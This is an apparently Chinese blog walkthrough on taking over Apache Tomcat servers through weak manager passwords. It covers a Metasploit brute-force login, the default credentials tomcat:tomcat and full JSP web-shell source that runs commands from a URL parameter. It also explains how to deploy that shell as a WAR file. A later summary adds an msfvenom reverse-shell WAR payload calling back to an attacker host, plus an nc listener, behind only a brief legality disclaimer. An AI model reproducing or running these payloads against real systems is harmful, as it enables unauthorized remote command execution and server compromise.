Tomcat弱口令+war部署getshell

影响版本

全版本

漏洞复现

msf爆破

use auxiliary/scanner/http/tomcat_mgr_login

设置IP和端口

set rhosts 10.7.10.41
set rport 8080(默认端口)

run运行
在这里插入图片描述

tomcat:tomcat

在这里插入图片描述
登陆成功
在这里插入图片描述
用大佬的jsp一句话马
在这里插入图片描述

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

然后把shell.jsp压缩成zip然后改后缀为1.war上传
在这里插入图片描述
访问地址:http://xxxxxx:8080/1/shell.jsp
传参pwd和i

?pwd=123&i=ls(执行命令)

在这里插入图片描述
QQ:3075999532

参考文章:
https://www.cnblogs.com/mke2fs/p/12718669.html
https://www.cnblogs.com/qianxinggz/p/13440366.html

Tomcat弱口令复现及利用(反弹shell)是种常见的网络安全攻击手段,主要利用Tomcat服务器默认配置中的弱密码进行未授权访问。以下是具体的步骤和利用方法: ### 步骤:扫描目标服务器 首先,需要使用端口扫描工具(如Nmap)扫描目标服务器的开放端口,确认Tomcat服务是否运行在默认的8080端口。 ```bash nmap -p 8080 <目标IP> ``` ### 步骤二:访问Tomcat管理页面 在浏览器中访问`http://<目标IP>:8080/manager/html`,尝试使用默认的用户名和密码进行登录。常见的默认用户名和密码组合有: - `admin/admin` - `tomcat/tomcat` - `manager/manager` ### 步骤三:利用弱口令上传WAR旦成功登录Tomcat管理页面,可以使用WAR包上传功能来部署个恶意的Web应用,从而实现反弹shell。 1. **创建WAR包**:首先,需要创建个包含反弹shell代码的WAR包。可以使用以下命令生成个简单的WAR包: ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=<攻击者IP> LPORT=<攻击者端口> -f war > shell.war ``` 2. **上传WAR包**:在Tomcat管理页面中,选择“部署WAR文件”选项,上传刚刚生成的`shell.war`文件。 ### 步骤四:启动反弹shell 上传成功后,访问`http://<目标IP>:8080/shell/`,此时会触发反弹shell。攻击者需要在本地启动个监听端口来接收反弹的shell连接。 ```bash nc -lvnp <攻击者端口> ``` ### 步骤五:验证反弹shell 旦反弹shell成功,攻击者将获得目标服务器的命令行访问权限,可以执行任意命令。 ### 注意事项 - **合法性**:在进行任何安全测试之前,请确保您已获得目标系统的合法授权。 - **风险**:未经授权的访问和攻击是非法的,可能导致法律责任。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值